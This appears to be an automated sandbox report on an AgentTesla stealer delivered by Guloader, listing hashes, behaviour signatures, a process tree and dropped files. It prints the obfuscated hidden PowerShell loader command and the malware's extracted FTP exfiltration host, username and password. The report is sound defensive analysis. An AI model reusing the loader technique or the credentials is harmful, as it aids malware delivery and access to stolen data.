Overview

overview

10

Static

static

1

fordanskni...nd.exe

windows7-x64

10

fordanskni...nd.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2023 14:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fordanskningernes hildebrand.exe

  • Size

    684KB

  • MD5

    8db600d5b4168b5d358209fa4b85bd5f

  • SHA1

    d6822e043548fbacd692a14d7dc17250482c43bc

  • SHA256

    2ef9a5215999c03ea03636ae06f8c66b3ed1274153bdaec215a189cd148669b5

  • SHA512

    c2103215579019f69aa3e4adfa2067d90c9189c093c7b065e9693e3d8745f084810e7652dd0e2e6638eecc18344641aaa23460eb2799c3829b73462b08f741ca

  • SSDEEP

    12288:swFGHEDwfu4MFVS/GCFj+an2ry7/hFwz7ylgimtdYM3O0V7bbj:s5HEMfuDDSuCF6an2rg/hF7lgZtub0Vv

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fordanskningernes hildebrand.exe
    "C:\Users\Admin\AppData\Local\Temp\fordanskningernes hildebrand.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1172
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Osirify120=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win';$Calvarias=$Osirify120.SubString(53221,3);.$Calvarias($Osirify120)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1720

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcii5j5q.dmt.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win
    Filesize

    52KB

    MD5

    b78df76358c01d725b0d9e498d32d595

    SHA1

    89c5bc6f9d1d1da207899ce0677c24a99329dc70

    SHA256

    6cacb39cdff332ae98782d33db6fc877a76a8e1e01fa7a0ec9acf45a19cca2ea

    SHA512

    d7268e8c0e6040515d385835206af5b67c78ec5f6c4bdf7053ec28c00e3dcfdfa318fd03935e989bd856e3614a2ebb2d8bc50e2ecdbe7433b211291b0746cf8d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Overfit.Hov
    Filesize

    270KB

    MD5

    ec46e3263c35f658579cd1572e57def0

    SHA1

    18468cb8363e04d8257fd5503cc6350ff7432b88

    SHA256

    690cdbe972c183ace073bad0f8567a3f2f2f15bf3f31e0e714797fdd68bc4e03

    SHA512

    d283ea4285dd37379499dc45128449b05b41229149d22819d3b40f80deba233be346741242d6f64f0697562f1fbec5d2818b7d05e0a4d95692246334bca85768

    Download Submit

  • memory/1680-181-0x0000000074070000-0x0000000074820000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1680-153-0x0000000005120000-0x0000000005130000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1680-156-0x0000000006000000-0x0000000006066000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1680-154-0x0000000005760000-0x0000000005D88000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1680-162-0x0000000006070000-0x00000000060D6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1680-167-0x00000000062E0000-0x0000000006634000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1680-151-0x0000000074070000-0x0000000074820000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1680-169-0x0000000006720000-0x000000000676C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1680-170-0x0000000005120000-0x0000000005130000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1680-171-0x00000000076B0000-0x0000000007746000-memory.dmp

    Filesize

    600KB

    Download

  • memory/1680-172-0x0000000006C10000-0x0000000006C2A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1680-173-0x0000000006C30000-0x0000000006C52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1680-174-0x0000000007D00000-0x00000000082A4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1680-194-0x0000000074070000-0x0000000074820000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1680-176-0x0000000008930000-0x0000000008FAA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1680-152-0x00000000050E0000-0x0000000005116000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1680-179-0x0000000007BD0000-0x0000000007BD4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1680-183-0x0000000005120000-0x0000000005130000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1680-168-0x00000000066D0000-0x00000000066EE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1680-155-0x0000000005700000-0x0000000005722000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1680-180-0x0000000008FB0000-0x000000000AB74000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1680-185-0x0000000077CD1000-0x0000000077DF1000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/1680-186-0x0000000005120000-0x0000000005130000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1680-182-0x0000000008FB0000-0x000000000AB74000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1680-188-0x0000000008FB0000-0x000000000AB74000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1680-197-0x0000000008FB0000-0x000000000AB74000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1720-198-0x0000000020780000-0x00000000207D0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/1720-191-0x000000006EE70000-0x00000000700C4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1720-192-0x00000000005B0000-0x0000000002174000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1720-195-0x000000006EE70000-0x000000006EEB0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1720-189-0x0000000077D58000-0x0000000077D59000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1720-193-0x0000000074070000-0x0000000074820000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1720-196-0x00000000201F0000-0x0000000020200000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1720-190-0x0000000077CD1000-0x0000000077DF1000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/1720-187-0x00000000005B0000-0x0000000002174000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1720-199-0x0000000020F50000-0x0000000020FE2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1720-200-0x00000000207D0000-0x00000000207DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1720-202-0x00000000005B0000-0x0000000002174000-memory.dmp

    Filesize

    27.8MB

    Download

  • memory/1720-204-0x0000000074070000-0x0000000074820000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1720-206-0x00000000201F0000-0x0000000020200000-memory.dmp

    Filesize

    64KB

    Download